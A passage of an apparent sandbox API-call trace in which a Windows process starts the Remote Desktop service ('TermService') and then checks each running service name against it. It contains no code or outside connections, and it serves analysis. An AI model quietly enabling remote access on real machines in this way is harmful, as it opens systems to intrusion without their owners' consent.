0x6ad5a8 [0318.079] OpenServiceW (hSCManager=0x6ad5a8, lpServiceName="TermService", dwDesiredAccess=0x10) returned 0x6ad670 [0318.079] StartServiceW (hService=0x6ad670, dwNumServiceArgs=0x0, lpServiceArgVectors=0x0) returned 1 [0319.279] CloseServiceHandle (hSCObject=0x6ad5a8) returned 1 [0319.279] CloseServiceHandle (hSCObject=0x6ad670) returned 1 [0319.280] GetProcessHeap () returned 0x650000 [0319.281] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6cc7b0 | out: hHeap=0x650000) returned 1 [0319.285] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName="ServicesActive", dwDesiredAccess=0x5) returned 0x6ad508 [0319.287] EnumServicesStatusExW (in: hSCManager=0x6ad508, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x3, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x488fef8, lpServicesReturned=0x488ff04, lpResumeHandle=0x488fefc, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x488fef8, lpServicesReturned=0x488ff04, lpResumeHandle=0x488fefc) returned 0 [0319.378] GetProcessHeap () returned 0x650000 [0319.378] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x60b6) returned 0x6cc7b0 [0319.379] EnumServicesStatusExW (in: hSCManager=0x6ad508, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x3, lpServices=0x6cc7b0, cbBufSize=0x60b6, pcbBytesNeeded=0x488fef8, lpServicesReturned=0x488ff04, lpResumeHandle=0x488fefc, pszGroupName=0x0 | out: lpServices=0x6cc7b0, pcbBytesNeeded=0x488fef8, lpServicesReturned=0x488ff04, lpResumeHandle=0x488fefc) returned 1 [0319.385] CloseServiceHandle (hSCObject=0x6ad508) returned 1 [0319.385] lstrlenW (lpString="AJRouter") returned 8 [0319.385] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.386] lstrlenW (lpString="AJRouter") returned 8 [0319.386] lstrcpyW (in: lpString1=0x3790000, lpString2="AJRouter" | out: lpString1="AJRouter") returned="AJRouter" [0319.386] lstrcmpW (lpString1="AJRouter", lpString2="TermService") returned -1 [0319.386] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.386] lstrlenW (lpString="ALG") returned 3 [0319.386] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.387] lstrlenW (lpString="ALG") returned 3 [0319.387] lstrcpyW (in: lpString1=0x3790000, lpString2="ALG" | out: lpString1="ALG") returned="ALG" [0319.387] lstrcmpW (lpString1="ALG", lpString2="TermService") returned -1 [0319.387] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.387] lstrlenW (lpString="AppIDSvc") returned 8 [0319.387] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.388] lstrlenW (lpString="AppIDSvc") returned 8 [0319.388] lstrcpyW (in: lpString1=0x3790000, lpString2="AppIDSvc" | out: lpString1="AppIDSvc") returned="AppIDSvc" [0319.388] lstrcmpW (lpString1="AppIDSvc", lpString2="TermService") returned -1 [0319.388] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.388] lstrlenW (lpString="Appinfo") returned 7 [0319.388] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.389] lstrlenW (lpString="Appinfo") returned 7 [0319.389] lstrcpyW (in: lpString1=0x3790000, lpString2="Appinfo" | out: lpString1="Appinfo") returned="Appinfo" [0319.389] lstrcmpW (lpString1="Appinfo", lpString2="TermService") returned -1 [0319.389] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.389] lstrlenW (lpString="AppMgmt") returned 7 [0319.389] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.390] lstrlenW (lpString="AppMgmt") returned 7 [0319.390] lstrcpyW (in: lpString1=0x3790000, lpString2="AppMgmt" | out: lpString1="AppMgmt") returned="AppMgmt" [0319.390] lstrcmpW (lpString1="AppMgmt", lpString2="TermService") returned -1 [0319.390] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.390] lstrlenW (lpString="AppReadiness") returned 12 [0319.390] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.391] lstrlenW (lpString="AppReadiness") returned 12 [0319.391] lstrcpyW (in: lpString1=0x3790000, lpString2="AppReadiness" | out: lpString1="AppReadiness") returned="AppReadiness" [0319.391] lstrcmpW (lpString1="AppReadiness", lpString2="TermService") returned -1 [0319.391] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.391] lstrlenW (lpString="AppXSvc") returned 7 [0319.391] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.392] lstrlenW (lpString="AppXSvc") returned 7 [0319.392] lstrcpyW (in: lpString1=0x3790000, lpString2="AppXSvc" | out: lpString1="AppXSvc") returned="AppXSvc" [0319.392] lstrcmpW (lpString1="AppXSvc", lpString2="TermService") returned -1 [0319.392] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.392] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0319.392] VirtualAlloc (lpAddress=0x0, dwSize=0x2a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.392] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0319.392] lstrcpyW (in: lpString1=0x3790000, lpString2="AudioEndpointBuilder" | out: lpString1="AudioEndpointBuilder") returned="AudioEndpointBuilder" [0319.393] lstrcmpW (lpString1="AudioEndpointBuilder", lpString2="TermService") returned -1 [0319.393] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.393] lstrlenW (lpString="Audiosrv") returned 8 [0319.393] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.393] lstrlenW (lpString="Audiosrv") returned 8 [0319.393] lstrcpyW (in: lpString1=0x3790000, lpString2="Audiosrv" | out: lpString1="Audiosrv") returned="Audiosrv" [0319.393] lstrcmpW (lpString1="Audiosrv", lpString2="TermService") returned -1 [0319.393] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.394] lstrlenW (lpString="AxInstSV") returned 8 [0319.394] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.394] lstrlenW (lpString="AxInstSV") returned 8 [0319.394] lstrcpyW (in: lpString1=0x3790000, lpString2="AxInstSV" | out: lpString1="AxInstSV") returned="AxInstSV" [0319.394] lstrcmpW (lpString1="AxInstSV", lpString2="TermService") returned -1 [0319.394] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.395] lstrlenW (lpString="BDESVC") returned 6 [0319.395] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.395] lstrlenW (lpString="BDESVC") returned 6 [0319.395] lstrcpyW (in: lpString1=0x3790000, lpString2="BDESVC" | out: lpString1="BDESVC") returned="BDESVC" [0319.395] lstrcmpW (lpString1="BDESVC", lpString2="TermService") returned -1 [0319.395] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.396] lstrlenW (lpString="BFE") returned 3 [0319.396] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.396] lstrlenW (lpString="BFE") returned 3 [0319.396] lstrcpyW (in: lpString1=0x3790000, lpString2="BFE" | out: lpString1="BFE") returned="BFE" [0319.396] lstrcmpW (lpString1="BFE", lpString2="TermService") returned -1 [0319.396] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.397] lstrlenW (lpString="BITS") returned 4 [0319.397] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.397] lstrlenW (lpString="BITS") returned 4 [0319.397] lstrcpyW (in: lpString1=0x3790000, lpString2="BITS" | out: lpString1="BITS") returned="BITS" [0319.397] lstrcmpW (lpString1="BITS", lpString2="TermService") returned -1 [0319.397] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.398] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0319.398] VirtualAlloc (lpAddress=0x0, dwSize=0x2a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.398] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0319.398] lstrcpyW (in: lpString1=0x3790000, lpString2="BrokerInfrastructure" | out: lpString1="BrokerInfrastructure") returned="BrokerInfrastructure" [0319.398] lstrcmpW (lpString1="BrokerInfrastructure", lpString2="TermService") returned -1 [0319.398] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.399] lstrlenW (lpString="Browser") returned 7 [0319.399] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.399] lstrlenW (lpString="Browser") returned 7 [0319.399] lstrcpyW (in: lpString1=0x3790000, lpString2="Browser" | out: lpString1="Browser") returned="Browser" [0319.399] lstrcmpW (lpString1="Browser", lpString2="TermService") returned -1 [0319.399] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.400] lstrlenW (lpString="BthHFSrv") returned 8 [0319.400] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.400] lstrlenW (lpString="BthHFSrv") returned 8 [0319.400] lstrcpyW (in: lpString1=0x3790000, lpString2="BthHFSrv" | out: lpString1="BthHFSrv") returned="BthHFSrv" [0319.400] lstrcmpW (lpString1="BthHFSrv", lpString2="TermService") returned -1 [0319.400] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.401] lstrlenW (lpString="bthserv") returned 7 [0319.401] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.401] lstrlenW (lpString="bthserv") returned 7 [0319.401] lstrcpyW (in: lpString1=0x3790000, lpString2="bthserv" | out: lpString1="bthserv") returned="bthserv" [0319.401] lstrcmpW (lpString1="bthserv", lpString2="TermService") returned -1 [0319.401] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.402] lstrlenW (lpString="CDPSvc") returned 6 [0319.402] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.403] lstrlenW (lpString="CDPSvc") returned 6 [0319.403] lstrcpyW (in: lpString1=0x3790000, lpString2="CDPSvc" | out: lpString1="CDPSvc") returned="CDPSvc" [0319.403] lstrcmpW (lpString1="CDPSvc", lpString2="TermService") returned -1 [0319.403] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.404] lstrlenW (lpString="CertPropSvc") returned 11 [0319.404] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.405] lstrlenW (lpString="CertPropSvc") returned 11 [0319.405] lstrcpyW (in: lpString1=0x3790000, lpString2="CertPropSvc" | out: lpString1="CertPropSvc") returned="CertPropSvc" [0319.405] lstrcmpW (lpString1="CertPropSvc", lpString2="TermService") returned -1 [0319.405] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.405] lstrlenW (lpString="ClickToRunSvc") returned 13 [0319.405] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.406] lstrlenW (lpString="ClickToRunSvc") returned 13 [0319.406] lstrcpyW (in: lpString1=0x3790000, lpString2="ClickToRunSvc" | out: lpString1="ClickToRunSvc") returned="ClickToRunSvc" [0319.406] lstrcmpW (lpString1="ClickToRunSvc", lpString2="TermService") returned -1 [0319.406] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.407] lstrlenW (lpString="ClipSVC") returned 7 [0319.407] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.407] lstrlenW (lpString="ClipSVC") returned 7 [0319.407] lstrcpyW (in: lpString1=0x3790000, lpString2="ClipSVC" | out: lpString1="ClipSVC") returned="ClipSVC" [0319.407] lstrcmpW (lpString1="ClipSVC", lpString2="TermService") returned -1 [0319.407] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.408] lstrlenW (lpString="COMSysApp") returned 9 [0319.408] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.409] lstrlenW (lpString="COMSysApp") returned 9 [0319.409] lstrcpyW (in: lpString1=0x3790000, lpString2="COMSysApp" | out: lpString1="COMSysApp") returned="COMSysApp" [0319.409] lstrcmpW (lpString1="COMSysApp", lpString2="TermService") returned -1 [0319.409] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.410] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0319.410] VirtualAlloc (lpAddress=0x0, dwSize=0x2e, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.410] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0319.410] lstrcpyW (in: lpString1=0x3790000, lpString2="CoreMessagingRegistrar" | out: lpString1="CoreMessagingRegistrar") returned="CoreMessagingRegistrar" [0319.410] lstrcmpW (lpString1="CoreMessagingRegistrar", lpString2="TermService") returned -1 [0319.410] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.411] lstrlenW (lpString="CryptSvc") returned 8 [0319.411] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.411] lstrlenW (lpString="CryptSvc") returned 8 [0319.411] lstrcpyW (in: lpString1=0x3790000, lpString2="CryptSvc" | out: lpString1="CryptSvc") returned="CryptSvc" [0319.412] lstrcmpW (lpString1="CryptSvc", lpString2="TermService") returned -1 [0319.412] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.413] lstrlenW (lpString="CscService") returned 10 [0319.413] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.414] lstrlenW (lpString="CscService") returned 10 [0319.414] lstrcpyW (in: lpString1=0x3790000, lpString2="CscService" | out: lpString1="CscService") returned="CscService" [0319.414] lstrcmpW (lpString1="CscService", lpString2="TermService") returned -1 [0319.414] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.415] lstrlenW (lpString="DcomLaunch") returned 10 [0319.415] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.415] lstrlenW (lpString="DcomLaunch") returned 10 [0319.415] lstrcpyW (in: lpString1=0x3790000, lpString2="DcomLaunch" | out: lpString1="DcomLaunch") returned="DcomLaunch" [0319.415] lstrcmpW (lpString1="DcomLaunch", lpString2="TermService") returned -1 [0319.416] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.416] lstrlenW (lpString="DcpSvc") returned 6 [0319.416] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.417] lstrlenW (lpString="DcpSvc") returned 6 [0319.417] lstrcpyW (in: lpString1=0x3790000, lpString2="DcpSvc" | out: lpString1="DcpSvc") returned="DcpSvc" [0319.417] lstrcmpW (lpString1="DcpSvc", lpString2="TermService") returned -1 [0319.417] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.418] lstrlenW (lpString="defragsvc") returned 9 [0319.418] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.419] lstrlenW (lpString="defragsvc") returned 9 [0319.419] lstrcpyW (in: lpString1=0x3790000, lpString2="defragsvc" | out: lpString1="defragsvc") returned="defragsvc" [0319.419] lstrcmpW (lpString1="defragsvc", lpString2="TermService") returned -1 [0319.419] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.420] lstrlenW (lpString="DeviceAssociationService") returned 24 [0319.420] VirtualAlloc (lpAddress=0x0, dwSize=0x32, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.421] lstrlenW (lpString="DeviceAssociationService") returned 24 [0319.421] lstrcpyW (in: lpString1=0x3790000, lpString2="DeviceAssociationService" | out: lpString1="DeviceAssociationService") returned="DeviceAssociationService" [0319.421] lstrcmpW (lpString1="DeviceAssociationService", lpString2="TermService") returned -1 [0319.421] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.422] lstrlenW (lpString="DeviceInstall") returned 13 [0319.423] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.424] lstrlenW (lpString="DeviceInstall") returned 13 [0319.424] lstrcpyW (in: lpString1=0x3790000, lpString2="DeviceInstall" | out: lpString1="DeviceInstall") returned="DeviceInstall" [0319.424] lstrcmpW (lpString1="DeviceInstall", lpString2="TermService") returned -1 [0319.424] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.425] lstrlenW (lpString="DevQueryBroker") returned 14 [0319.425] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.425] lstrlenW (lpString="DevQueryBroker") returned 14 [0319.425] lstrcpyW (in: lpString1=0x3790000, lpString2="DevQueryBroker" | out: lpString1="DevQueryBroker") returned="DevQueryBroker" [0319.425] lstrcmpW (lpString1="DevQueryBroker", lpString2="TermService") returned -1 [0319.425] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.426] lstrlenW (lpString="Dhcp") returned 4 [0319.426] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.426] lstrlenW (lpString="Dhcp") returned 4 [0319.426] lstrcpyW (in: lpString1=0x3790000, lpString2="Dhcp" | out: lpString1="Dhcp") returned="Dhcp" [0319.426] lstrcmpW (lpString1="Dhcp", lpString2="TermService") returned -1 [0319.426] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.427] lstrlenW (lpString="diagnosticshub.standardcollector.service") returned 40 [0319.427] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.938] lstrlenW (lpString="diagnosticshub.standardcollector.service") returned 40 [0319.939] lstrcpyW (in: lpString1=0x3790000, lpString2="diagnosticshub.standardcollector.service" | out: lpString1="diagnosticshub.standardcollector.service") returned="diagnosticshub.standardcollector.service" [0319.939] lstrcmpW (lpString1="diagnosticshub.standardcollector.service", lpString2="TermService") returned -1 [0319.939] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.955] lstrlenW (lpString="DiagTrack") returned 9 [0319.955] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.956] lstrlenW (lpString="DiagTrack") returned 9 [0319.956] lstrcpyW (in: lpString1=0x3790000, lpString2="DiagTrack" | out: lpString1="DiagTrack") returned="DiagTrack" [0319.961] lstrcmpW (lpString1="DiagTrack", lpString2="TermService") returned -1 [0319.961] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.964] lstrlenW (lpString="DmEnrollmentSvc") returned 15 [0319.964] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.965] lstrlenW (lpString="DmEnrollmentSvc") returned 15 [0319.965] lstrcpyW (in: lpString1=0x3790000, lpString2="DmEnrollmentSvc" | out: lpString1="DmEnrollmentSvc") returned="DmEnrollmentSvc" [0319.965] lstrcmpW (lpString1="DmEnrollmentSvc", lpString2="TermService") returned -1 [0319.965] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.966] lstrlenW (lpString="dmwappushservice") returned 16 [0319.966] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.968] lstrlenW (lpString="dmwappushservice") returned 16 [0319.968] lstrcpyW (in: lpString1=0x3790000, lpString2="dmwappushservice" | out: lpString1="dmwappushservice") returned="dmwappushservice" [0319.968] lstrcmpW (lpString1="dmwappushservice", lpString2="TermService") returned -1 [0319.968] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.969] lstrlenW (lpString="Dnscache") returned 8 [0319.969] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.969] lstrlenW (lpString="Dnscache") returned 8 [0319.969] lstrcpyW (in: lpString1=0x3790000, lpString2="Dnscache" | out: lpString1="Dnscache") returned="Dnscache" [0319.969] lstrcmpW (lpString1="Dnscache", lpString2="TermService") returned -1 [0319.969] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.970] lstrlenW (lpString="DoSvc") returned 5 [0319.970] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.970] lstrlenW (lpString="DoSvc") returned 5 [0319.970] lstrcpyW (in: lpString1=0x3790000, lpString2="DoSvc" | out: lpString1="DoSvc") returned="DoSvc" [0319.971] lstrcmpW (lpString1="DoSvc", lpString2="TermService") returned -1 [0319.971] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.971] lstrlenW (lpString="dot3svc") returned 7 [0319.971] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.972] lstrlenW (lpString="dot3svc") returned 7 [0319.972] lstrcpyW (in: lpString1=0x3790000, lpString2="dot3svc" | out: lpString1="dot3svc") returned="dot3svc" [0319.972] lstrcmpW (lpString1="dot3svc", lpString2="TermService") returned -1 [0319.972] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.973] lstrlenW (lpString="DPS") returned 3 [0319.973] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.974] lstrlenW (lpString="DPS") returned 3 [0319.974] lstrcpyW (in: lpString1=0x3790000, lpString2="DPS" | out: lpString1="DPS") returned="DPS" [0319.974] lstrcmpW (lpString1="DPS", lpString2="TermService") returned -1 [0319.974] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.974] lstrlenW (lpString="DsmSvc") returned 6 [0319.974] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.975] lstrlenW (lpString="DsmSvc") returned 6 [0319.975] lstrcpyW (in: lpString1=0x3790000, lpString2="DsmSvc" | out: lpString1="DsmSvc") returned="DsmSvc" [0319.975] lstrcmpW (lpString1="DsmSvc", lpString2="TermService") returned -1 [0319.975] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.976] lstrlenW (lpString="DsSvc") returned 5 [0319.976] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.976] lstrlenW (lpString="DsSvc") returned 5 [0319.976] lstrcpyW (in: lpString1=0x3790000, lpString2="DsSvc" | out: lpString1="DsSvc") returned="DsSvc" [0319.976] lstrcmpW (lpString1="DsSvc", lpString2="TermService") returned -1 [0319.976] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.977] lstrlenW (lpString="Eaphost") returned 7 [0319.977] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.977] lstrlenW (lpString="Eaphost") returned 7 [0319.977] lstrcpyW (in: lpString1=0x3790000, lpString2="Eaphost" | out: lpString1="Eaphost") returned="Eaphost" [0319.977] lstrcmpW (lpString1="Eaphost", lpString2="TermService") returned -1 [0319.978] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.978] lstrlenW (lpString="EFS") returned 3 [0319.978] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.979] lstrlenW (lpString="EFS") returned 3 [0319.979] lstrcpyW (in: lpString1=0x3790000, lpString2="EFS" | out: lpString1="EFS") returned="EFS" [0319.979] lstrcmpW (lpString1="EFS", lpString2="TermService") returned -1 [0319.979] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.980] lstrlenW (lpString="embeddedmode") returned 12 [0319.980] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.980] lstrlenW (lpString="embeddedmode") returned 12 [0319.980] lstrcpyW (in: lpString1=0x3790000, lpString2="embeddedmode" | out: lpString1="embeddedmode") returned="embeddedmode" [0319.980] lstrcmpW (lpString1="embeddedmode", lpString2="TermService") returned -1 [0319.980] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.981] lstrlenW (lpString="EntAppSvc") returned 9 [0319.981] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.981] lstrlenW (lpString="EntAppSvc") returned 9 [0319.981] lstrcpyW (in: lpString1=0x3790000, lpString2="EntAppSvc" | out: lpString1="EntAppSvc") returned="EntAppSvc" [0319.981] lstrcmpW (lpString1="EntAppSvc", lpString2="TermService") returned -1 [0319.981] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.982] lstrlenW (lpString="EventLog") returned 8 [0319.982] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.983] lstrlenW (lpString="EventLog") returned 8 [0319.983] lstrcpyW (in: lpString1=0x3790000, lpString2="EventLog" | out: lpString1="EventLog") returned="EventLog" [0319.983] lstrcmpW (lpString1="EventLog", lpString2="TermService") returned -1 [0319.983] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.983] lstrlenW (lpString="EventSystem") returned 11 [0319.983] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.984] lstrlenW (lpString="EventSystem") returned 11 [0319.984] lstrcpyW (in: lpString1=0x3790000, lpString2="EventSystem" | out: lpString1="EventSystem") returned="EventSystem" [0319.984] lstrcmpW (lpString1="EventSystem", lpString2="TermService") returned -1 [0319.984] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.985] lstrlenW (lpString="Fax") returned 3 [0319.985] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.985] lstrlenW (lpString="Fax") returned 3 [0319.985] lstrcpyW (in: lpString1=0x3790000, lpString2="Fax" | out: lpString1="Fax") returned="Fax" [0319.985] lstrcmpW (lpString1="Fax", lpString2="TermService") returned -1 [0319.985] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.986] lstrlenW (lpString="fdPHost") returned 7 [0319.986] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.986] lstrlenW (lpString="fdPHost") returned 7 [0319.986] lstrcpyW (in: lpString1=0x3790000, lpString2="fdPHost" | out: lpString1="fdPHost") returned="fdPHost" [0319.986] lstrcmpW (lpString1="fdPHost", lpString2="TermService") returned -1 [0319.986] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0319.987] lstrlenW (lpString="FDResPub") returned 8 [0319.987] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0319.988] lstrlenW (lpString="FDResPub") returned 8 [0319.988] lstrcpyW (in: lpString1=0x3790000, lpString2="FDResPub" | out: lpString1="FDResPub") returned="FDResPub" [0319.988] lstrcmpW 